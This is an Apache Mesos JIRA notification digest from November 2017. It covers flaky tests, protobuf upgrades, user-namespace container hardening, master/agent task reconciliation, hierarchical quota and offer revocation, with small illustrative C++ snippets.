[jira] [Created] (MESOS-8210) ReconciliationTest.RemovalInProgress is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)
Alexander Rukletsov created MESOS-8210:
--

 Summary: ReconciliationTest.RemovalInProgress is flaky.
 Key: MESOS-8210
 URL: https://issues.apache.org/jira/browse/MESOS-8210
 Project: Mesos
  Issue Type: Bug
  Components: test
 Environment: Ubuntu 16.04
Reporter: Alexander Rukletsov
 Attachments: RemovalInProgress-badrun.txt

Observed it today on our internal CI:
{noformat}
/home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/reconciliation_tests.cpp:655
Mock function called more times than expected - taking default action specified 
at:
/home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/mock_registrar.cpp:54:
Function call: apply(16-byte object )
  Returns: 16-byte object <90-C5 04-00 D0-7F 00-00 F0-DB 05-00 D0-7F 
00-00>
 Expected: to be called once
   Actual: called twice - over-saturated and active
{noformat}
Full log attached.
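For reference, this is how gmock reports an over-saturated expectation: the mocked {{apply}} call is expected once but arrives a second time, so gmock falls back to the default action. A minimal, standalone illustration of that failure mode (hypothetical mock, not the actual {{MockRegistrar}} test code):
{code:cpp}
#include <gmock/gmock.h>
#include <gtest/gtest.h>

// Hypothetical interface standing in for the registrar; not Mesos code.
class Registrar
{
public:
  virtual ~Registrar() {}
  virtual bool apply(int operation) = 0;
};

class MockRegistrar : public Registrar
{
public:
  MOCK_METHOD1(apply, bool(int));
};

TEST(OverSaturationExample, SecondCallTripsTheExpectation)
{
  MockRegistrar registrar;

  // "Expected: to be called once" -- a second call makes the expectation
  // "over-saturated", and gmock takes the default action instead.
  EXPECT_CALL(registrar, apply(testing::_))
    .Times(1)
    .WillOnce(testing::Return(true));

  registrar.apply(1);
  registrar.apply(2); // Produces the "called twice - over-saturated" failure.
}
{code}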



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8210) ReconciliationTest.RemovalInProgress is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8210?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexander Rukletsov updated MESOS-8210:
---
Attachment: RemovalInProgress-badrun.txt

> ReconciliationTest.RemovalInProgress is flaky.
> --
>
> Key: MESOS-8210
> URL: https://issues.apache.org/jira/browse/MESOS-8210
> Project: Mesos
>  Issue Type: Bug
>  Components: test
> Environment: Ubuntu 16.04
>Reporter: Alexander Rukletsov
>  Labels: flaky-test
> Attachments: RemovalInProgress-badrun.txt
>
>
> Observed it today on our internal CI:
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/reconciliation_tests.cpp:655
> Mock function called more times than expected - taking default action 
> specified at:
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/mock_registrar.cpp:54:
> Function call: apply(16-byte object  D0-7F 00-00>)
>   Returns: 16-byte object <90-C5 04-00 D0-7F 00-00 F0-DB 05-00 D0-7F 
> 00-00>
>  Expected: to be called once
>Actual: called twice - over-saturated and active
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8211) Handle agent local resources in offer operation handler

2017-11-13 Thread Jan Schlicht (JIRA)
Jan Schlicht created MESOS-8211:
---

 Summary: Handle agent local resources in offer operation handler
 Key: MESOS-8211
 URL: https://issues.apache.org/jira/browse/MESOS-8211
 Project: Mesos
  Issue Type: Task
  Components: agent
Reporter: Jan Schlicht
Assignee: Jan Schlicht


The master will send {{ApplyOfferOperationMessage}} instead of 
{{CheckpointResourcesMessage}} when an agent has the 'RESOURCE_PROVIDER' 
capability set. The agent handler for the message needs to be updated to 
support operations on agent resources.
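A toy sketch of the capability-gated choice described above; the message and capability names come from this ticket, while the surrounding types are hypothetical stand-ins rather than the real master/agent code:
{code:cpp}
// Illustration only: which message the master would send for an offer
// operation, depending on the agent's RESOURCE_PROVIDER capability.
#include <iostream>
#include <set>
#include <string>

struct Agent
{
  std::set<std::string> capabilities;
};

std::string messageForOfferOperation(const Agent& agent)
{
  if (agent.capabilities.count("RESOURCE_PROVIDER") > 0) {
    return "ApplyOfferOperationMessage";
  }
  return "CheckpointResourcesMessage";
}

int main()
{
  Agent legacy;
  Agent capable;
  capable.capabilities.insert("RESOURCE_PROVIDER");

  std::cout << messageForOfferOperation(legacy) << std::endl;   // CheckpointResourcesMessage
  std::cout << messageForOfferOperation(capable) << std::endl;  // ApplyOfferOperationMessage
  return 0;
}
{code}
The agent-side work tracked here is the mirror image: handling {{ApplyOfferOperationMessage}} for operations on agent-local resources.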



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8139) Upgrade protobuf to 3.4.x.

2017-11-13 Thread Dmitry Zhuk (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8139?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16249555#comment-16249555
 ] 

Dmitry Zhuk commented on MESOS-8139:


https://reviews.apache.org/r/63752/
https://reviews.apache.org/r/63753/

> Upgrade protobuf to 3.4.x.
> --
>
> Key: MESOS-8139
> URL: https://issues.apache.org/jira/browse/MESOS-8139
> Project: Mesos
>  Issue Type: Task
>Reporter: Benjamin Mahler
>  Labels: performance
>
> The 3.4.x release includes move support:
> https://github.com/google/protobuf/releases/tag/v3.4.0
> This will provide some performance improvements for us, and will allow us to 
> start using move semantics for messages.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8212) SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8212?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexander Rukletsov updated MESOS-8212:
---
Attachment: RecoverTerminatedHTTPExecutor-badrun2.txt

> SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is flaky.
> ---
>
> Key: MESOS-8212
> URL: https://issues.apache.org/jira/browse/MESOS-8212
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Reporter: Alexander Rukletsov
>  Labels: flaky-test
> Attachments: RecoverTerminatedHTTPExecutor-badrun2.txt
>
>
> Observed in our internal CI:
> {noformat}
> ../../src/tests/slave_recovery_tests.cpp:1546: Failure
>   Expected: TASK_FAILED
> To be equal to: status->state()
>   Which is: TASK_RUNNING
> {noformat}
> Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8212) SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is flaky.

2017-11-13 Thread Alexander Rukletsov (JIRA)
Alexander Rukletsov created MESOS-8212:
--

 Summary: SlaveRecoveryTest/0.RecoverTerminatedHTTPExecutor is 
flaky.
 Key: MESOS-8212
 URL: https://issues.apache.org/jira/browse/MESOS-8212
 Project: Mesos
  Issue Type: Bug
  Components: test
Reporter: Alexander Rukletsov
 Attachments: RecoverTerminatedHTTPExecutor-badrun2.txt

Observed in our internal CI:
{noformat}
../../src/tests/slave_recovery_tests.cpp:1546: Failure
  Expected: TASK_FAILED
To be equal to: status->state()
  Which is: TASK_RUNNING
{noformat}
Full log attached.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8213) Private user namespaces for tasks

2017-11-13 Thread James Peach (JIRA)
James Peach created MESOS-8213:
--

 Summary: Private user namespaces for tasks
 Key: MESOS-8213
 URL: https://issues.apache.org/jira/browse/MESOS-8213
 Project: Mesos
  Issue Type: Improvement
  Components: containerization, security
Reporter: James Peach


Once MESOS-8142 implements generic user namespace support, we can improve 
security by adding another layer of user namespace that encapsulates just the 
final user task. This protects the kernel objects that are providing the 
containerization from the user task (since the private task namespace would no 
longer own the other namespaces).

This still would not alter the ID mapping of the user namespace.

This is a little tricky since we need to make the new namespace in the Mesos 
containerizer, so we need to take care of the following (a bare-bones sketch of 
the underlying namespace primitive follows the list):

* when to chroot
* when to drop capabilities after entering the new namespace
* supporting command, default and custom executors (does the latter make sense?)
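A standalone illustration of the primitive involved, i.e. giving just the task process its own user namespace via {{unshare(CLONE_NEWUSER)}}. This is not the Mesos containerizer code, and it deliberately leaves the ID mapping untouched:
{code:cpp}
// Standalone illustration: the task process enters a private user namespace
// before exec'ing the task, so it no longer owns the namespaces that provide
// the containerization. Not Mesos code.
#include <sched.h>     // unshare, CLONE_NEWUSER
#include <sys/wait.h>  // waitpid
#include <unistd.h>    // fork, readlink
#include <cstdio>

int main()
{
  pid_t pid = fork();
  if (pid == 0) {
    if (unshare(CLONE_NEWUSER) != 0) {
      perror("unshare(CLONE_NEWUSER)");
      return 1;
    }

    char ns[64] = {0};
    if (readlink("/proc/self/ns/user", ns, sizeof(ns) - 1) > 0) {
      printf("task user namespace: %s\n", ns);
    }

    // A real launcher would decide here when to chroot, when to drop
    // capabilities, and then execve() the task -- the open questions above.
    return 0;
  }

  waitpid(pid, nullptr, 0);
  return 0;
}
{code}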



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8214) Run a task in the root user namespace

2017-11-13 Thread James Peach (JIRA)
James Peach created MESOS-8214:
--

 Summary: Run a task in the root user namespace
 Key: MESOS-8214
 URL: https://issues.apache.org/jira/browse/MESOS-8214
 Project: Mesos
  Issue Type: Improvement
  Components: containerization, security
Reporter: James Peach


When the {{namespaces/user}} isolator is applied, we need a way for schedulers 
to specify that a task should run in the root user namespace, since such a task 
might need real host privileges. This mechanism should be plumbed through the 
authorization system so that the authorizer gets a chance to veto the scheduler.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8214) Run a task in the root user namespace

2017-11-13 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8214?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach reassigned MESOS-8214:
--

Assignee: James Peach

> Run a task in the root user namespace
> -
>
> Key: MESOS-8214
> URL: https://issues.apache.org/jira/browse/MESOS-8214
> Project: Mesos
>  Issue Type: Improvement
>  Components: containerization, security
>Reporter: James Peach
>Assignee: James Peach
>
> When the {{namespaces/user}} isolator is applied, we need a way for 
> schedulers to specify that a task should run in the root user namespace, 
> since such a task might need real host privileges. This mechanism should be 
> plumbed through the authorization system so that the authorizer gets a chance 
> to veto the scheduler.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8213) Private user namespaces for tasks

2017-11-13 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8213?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach reassigned MESOS-8213:
--

Assignee: James Peach

> Private user namespaces for tasks
> -
>
> Key: MESOS-8213
> URL: https://issues.apache.org/jira/browse/MESOS-8213
> Project: Mesos
>  Issue Type: Improvement
>  Components: containerization, security
>Reporter: James Peach
>Assignee: James Peach
>
> Once MESOS-8142 implements generic user namespace support, we can improve 
> security by adding another layer of user namespace that encapsulates just the 
> final user task. This protects the kernel objects that are providing the 
> containerization from the user task (since the private task namespace would 
> no longer own the other namespaces).
> This still would not alter the ID mapping of the user namespace.
> This is a little tricky since we need to make the new namespace in the Mesos 
> containerizer, so we need to take care of:
> * when to chroot
> * when to drop capabilities after entering the new namespace
> * supporting command, default and custom executors (does the latter make 
> sense?)



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8215) Rename Queue::get to be more descriptive

2017-11-13 Thread James Peach (JIRA)
James Peach created MESOS-8215:
--

 Summary: Rename Queue::get to be more descriptive
 Key: MESOS-8215
 URL: https://issues.apache.org/jira/browse/MESOS-8215
 Project: Mesos
  Issue Type: Improvement
  Components: libprocess
Reporter: James Peach


The {{Queue::get}} member is quite misleadingly named. When you see 
{{foo.get()}}, this strongly suggests to the reader that {{foo}} is some sort of 
{{Option}}, since that is the most common pattern in {{libprocess}}.

We should call this operation {{pop}}, to indicate that it is a destructive 
retrieval of the first queue element.
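A toy illustration of the naming argument, not the libprocess {{Queue}} implementation: {{pop()}} makes the destructive read obvious, whereas a member named {{get()}} reads like a non-destructive, Option-style accessor.
{code:cpp}
// Toy queue used only to illustrate the naming; not libprocess code.
#include <cassert>
#include <optional>
#include <queue>

template <typename T>
class ToyQueue
{
public:
  void put(const T& t) { items.push(t); }

  // "pop" signals a destructive retrieval of the first element.
  std::optional<T> pop()
  {
    if (items.empty()) {
      return std::nullopt;
    }
    T t = items.front();
    items.pop();
    return t;
  }

private:
  std::queue<T> items;
};

int main()
{
  ToyQueue<int> queue;
  queue.put(42);
  assert(queue.pop().value() == 42);   // Consumes the element.
  assert(!queue.pop().has_value());    // Nothing left to consume.
  return 0;
}
{code}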



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Ilya Pronin (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16249889#comment-16249889
 ] 

Ilya Pronin commented on MESOS-8185:


[~bmahler] I see you've already changed it.

Thanks! Sure, let's discuss all available options. I suggested killing because 
the current contract between the master and non-{{PARTITION_AWARE}} frameworks 
is that {{LOST}} tasks will be killed by the master.

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shuts down all non-partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill non-partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought would be killed. The 
> agent may re-register again, this time successfully, before being marked 
> unreachable, while never having terminated the tasks of non-partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # The connection from the master to the agent stops working.
> # The agent doesn't see pings from the master and attempts to re-register.
> # The master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, 
> which don't get to the agent because of the connection failure. The agent is 
> marked registered.
> # The network issue resolves, the connection breaks, and the agent retries 
> re-registration.
> # The master thinks that the agent has been registered since step (3) and 
> just re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks that the 
> already registered agent reports in {{ReregisterSlaveMessage}} with the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.
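A rough sketch of the comparison proposed in the last paragraph, using hypothetical types and names rather than the actual master code: anything the re-registering agent reports that the master does not know about gets flagged.
{code:cpp}
// Hypothetical sketch of reconciling the task list reported by an already
// registered agent against the master's view; not the actual Mesos code.
#include <iostream>
#include <set>
#include <string>
#include <vector>

int main()
{
  // Tasks the agent lists in its re-registration message.
  std::vector<std::string> reportedTasks = {"task-1", "task-2", "task-3"};

  // Tasks the master currently knows about for that agent.
  std::set<std::string> knownTasks = {"task-1"};

  for (const std::string& task : reportedTasks) {
    if (knownTasks.count(task) == 0) {
      // Per the proposal, such a task should not exist on the agent, so the
      // master could ask the agent to kill it (or otherwise reconcile it).
      std::cout << "Unknown to the master: " << task << std::endl;
    }
  }
  return 0;
}
{code}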



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Ilya Pronin (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16249889#comment-16249889
 ] 

Ilya Pronin edited comment on MESOS-8185 at 11/13/17 6:00 PM:
--

[~bmahler] I see you've already changed it. Thanks!

Sure, let's discuss all available options. I suggested killing because the 
current contract between the master and non-{{PARTITION_AWARE}} frameworks is 
that {{LOST}} tasks will be killed by the master.


was (Author: ipronin):
[~bmahler] I see you've already changed it.

Thanks! Sure, let's discuss all available options. I suggested killing, because 
current contract between master and not {{PARTITION_AWARE}} frameworks is that 
{{LOST}} tasks will be killed by master.

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shuts down all non-partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill non-partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought would be killed. The 
> agent may re-register again, this time successfully, before being marked 
> unreachable, while never having terminated the tasks of non-partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # The connection from the master to the agent stops working.
> # The agent doesn't see pings from the master and attempts to re-register.
> # The master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, 
> which don't get to the agent because of the connection failure. The agent is 
> marked registered.
> # The network issue resolves, the connection breaks, and the agent retries 
> re-registration.
> # The master thinks that the agent has been registered since step (3) and 
> just re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks that the 
> already registered agent reports in {{ReregisterSlaveMessage}} with the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Ilya Pronin (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ilya Pronin reassigned MESOS-8185:
--

Assignee: Ilya Pronin

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>Assignee: Ilya Pronin
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shuts down all non-partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill non-partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought would be killed. The 
> agent may re-register again, this time successfully, before being marked 
> unreachable, while never having terminated the tasks of non-partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # The connection from the master to the agent stops working.
> # The agent doesn't see pings from the master and attempts to re-register.
> # The master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, 
> which don't get to the agent because of the connection failure. The agent is 
> marked registered.
> # The network issue resolves, the connection breaks, and the agent retries 
> re-registration.
> # The master thinks that the agent has been registered since step (3) and 
> just re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks that the 
> already registered agent reports in {{ReregisterSlaveMessage}} with the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-7790) Design hierarchical quota allocation.

2017-11-13 Thread Michael Park (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7790?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250121#comment-16250121
 ] 

Michael Park commented on MESOS-7790:
-

https://docs.google.com/document/d/1EEpHIlJahYtjqv7zAEkW8U7Bi0CTYFDqAhU0laM7Rzk

> Design hierarchical quota allocation.
> -
>
> Key: MESOS-7790
> URL: https://issues.apache.org/jira/browse/MESOS-7790
> Project: Mesos
>  Issue Type: Task
>  Components: allocation
>Reporter: Benjamin Mahler
>Assignee: Michael Park
>  Labels: multitenancy
>
> When quota is assigned in the role hierarchy (see MESOS-6375), it's possible 
> for there to be "undelegated" quota for a role. For example:
> {noformat}
>              ^
>            /   \
>          /       \
>   eng (90 cpus)   sales (10 cpus)
>        ^
>      /   \
>    /       \
>  ads (50 cpus)   build (10 cpus)
> {noformat}
> Here, the "eng" role has 60 of its 90 cpus of quota delegated to its 
> children, and 30 cpus remain undelegated. We need to design how to allocate 
> these 30 cpus undelegated cpus. Are they allocated entirely to the "eng" 
> role? Are they allocated to the "eng" role tree? If so, how do we determine 
> how much is allocated to each role in the "eng" tree (i.e. "eng", "eng/ads", 
> "eng/build").



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8185:
---
Labels: reliability  (was: )

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>Assignee: Ilya Pronin
>  Labels: reliability
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shuts down all non-partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill non-partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought would be killed. The 
> agent may re-register again, this time successfully, before being marked 
> unreachable, while never having terminated the tasks of non-partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # The connection from the master to the agent stops working.
> # The agent doesn't see pings from the master and attempts to re-register.
> # The master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, 
> which don't get to the agent because of the connection failure. The agent is 
> marked registered.
> # The network issue resolves, the connection breaks, and the agent retries 
> re-registration.
> # The master thinks that the agent has been registered since step (3) and 
> just re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks that the 
> already registered agent reports in {{ReregisterSlaveMessage}} with the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8142) Improve container security with user namespaces

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8142?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8142:
--
Issue Type: Improvement  (was: Bug)

> Improve container security with user namespaces
> ---
>
> Key: MESOS-8142
> URL: https://issues.apache.org/jira/browse/MESOS-8142
> Project: Mesos
>  Issue Type: Improvement
>  Components: containerization, security
>Reporter: James Peach
>Assignee: James Peach
>
> As a first pass at supporting user namespaces, figure out how we can use them 
> to improve container security when running untrusted tasks.
> This ticket is specifically targeting how to build a user namespace hierarchy 
> and excluding any sort of ID mapping for the container images.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8185) Tasks can be known to the agent but unknown to the master.

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8185:
--
Sprint: Mesosphere Sprint 68

> Tasks can be known to the agent but unknown to the master.
> --
>
> Key: MESOS-8185
> URL: https://issues.apache.org/jira/browse/MESOS-8185
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0
>Reporter: Ilya Pronin
>Assignee: Ilya Pronin
>  Labels: reliability
>
> Currently, when a master re-registers an agent that was marked unreachable, 
> it shuts down all non-partition-aware frameworks on that agent. When a master 
> re-registers an agent that is already registered, it doesn't check that all 
> tasks from the slave's re-registration message are known to it.
> It is possible that due to a transient loss of connectivity an agent may miss 
> {{SlaveReregisteredMessage}} along with {{ShutdownFrameworkMessage}} and thus 
> will not kill non-partition-aware tasks. But the master will mark the agent 
> as registered and will not re-add tasks that it thought would be killed. The 
> agent may re-register again, this time successfully, before being marked 
> unreachable, while never having terminated the tasks of non-partition-aware 
> frameworks. The master will simply forget those tasks ever existed, because 
> it has "removed" them during the previous re-registration.
> Example scenario:
> # The connection from the master to the agent stops working.
> # The agent doesn't see pings from the master and attempts to re-register.
> # The master sends {{SlaveRegisteredMessage}} and {{ShutdownSlaveMessage}}, 
> which don't get to the agent because of the connection failure. The agent is 
> marked registered.
> # The network issue resolves, the connection breaks, and the agent retries 
> re-registration.
> # The master thinks that the agent has been registered since step (3) and 
> just re-sends {{SlaveRegisteredMessage}}. Tasks remain running on the agent.
> One of the possible solutions would be to compare the list of tasks that the 
> already registered agent reports in {{ReregisterSlaveMessage}} with the list 
> of tasks the master has. In this case anything that the master doesn't know 
> about should not exist on the agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8115) Add a master flag to disallow agents that are not configured with fault domain

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8115?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-8115:
--
Issue Type: Improvement  (was: Bug)

> Add a master flag to disallow agents that are not configured with fault domain
> --
>
> Key: MESOS-8115
> URL: https://issues.apache.org/jira/browse/MESOS-8115
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Vinod Kone
>Assignee: Vinod Kone
>
> Once Mesos masters and agents in a cluster are *all* upgraded to a version 
> where the fault domains feature is available, it is beneficial to enforce 
> that agents without a fault domain configured are not allowed to join the 
> cluster.
> This is a safety net for operators who could forget to configure the fault 
> domain of a remote agent and let it join the cluster. If this happens, an 
> agent in a remote region will be considered a local agent by the master and 
> frameworks (because the agent's fault domain is not configured), causing 
> tasks to potentially land on a remote agent, which is undesirable.
> Note that this has to be a configurable flag and not enforced by default, 
> because otherwise upgrades from a cluster without fault domains configured to 
> a configured cluster will not be possible.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8209) mesos master should revoke offers when executor state changes

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8209?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8209:
-

Assignee: Vinod Kone

> mesos master should revoke offers when executor state changes
> -
>
> Key: MESOS-8209
> URL: https://issues.apache.org/jira/browse/MESOS-8209
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jack Crawford
>Assignee: Vinod Kone
>
> Currently, the Mesos master does not revoke offers when the number of 
> executors on an agent decreases. This is a problem under certain conditions, 
> such as when running a workflow that starts lots of small tasks on agents, 
> with a one-executor-per-task model, a master that does not revoke resources 
> after a set amount of time, and a scheduler that does not reject resources.
> The problem is that when running a mono-scheduler framework (which you might 
> want to do to easily enforce authentication requirements, have a full view of 
> all scheduled tasks, etc.), in order to respond instantly when new tasks come 
> in, I have the scheduler simply hang on to all resource offers it receives, 
> and the master is set to never revoke offers. This way the scheduler always 
> has a pool of resources to quickly service new requests as they come in.
> However, if you start tasks fast enough, the agents can fill up with 
> executors, making it appear as if there are no resources available for the 
> scheduler to use. I've seen this on r4.4xlarge machines on AWS with executors 
> that consume 0.1 cpus and 32 MB of memory, where the entire machine will 
> appear to be filled with executors according to the master's resource offers. 
> The executors are exiting (just after the task finishes), but the resources 
> are not reclaimed because the master does not revoke the outstanding resource 
> offers to reflect the change.
> You can replicate this pretty easily if you schedule tasks that finish 
> instantly with a 1-1 executor to task ratio. I find that if I schedule ~1000 
> tasks this way on a single r4.4xlarge machine, usually 600-700 will finish 
> before all the resource offers to the scheduler fill up and the agent appears 
> to be "full" of executors.
> Changing the scheduler/master to periodically reject/revoke resources fixes 
> the problem.
> My suggestion is for the master to revoke and reissue resource offers when 
> the executor count changes on an agent.
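The workaround mentioned above (having the scheduler reject resources instead of hoarding them) amounts to declining offers with a refusal filter. A sketch against the old C++ scheduler driver API; offer-selection logic and error handling are omitted, and the 30-second refusal interval is an arbitrary choice:
{code:cpp}
#include <vector>

#include <mesos/scheduler.hpp>

// Decline offers the scheduler is not about to use, instead of holding them
// indefinitely, so the master keeps re-offering an up-to-date view.
void declineUnusedOffers(
    mesos::SchedulerDriver* driver,
    const std::vector<mesos::Offer>& offers)
{
  mesos::Filters filters;
  filters.set_refuse_seconds(30); // Don't re-offer these resources for 30s.

  for (const mesos::Offer& offer : offers) {
    driver->declineOffer(offer.id(), filters);
  }
}
{code}
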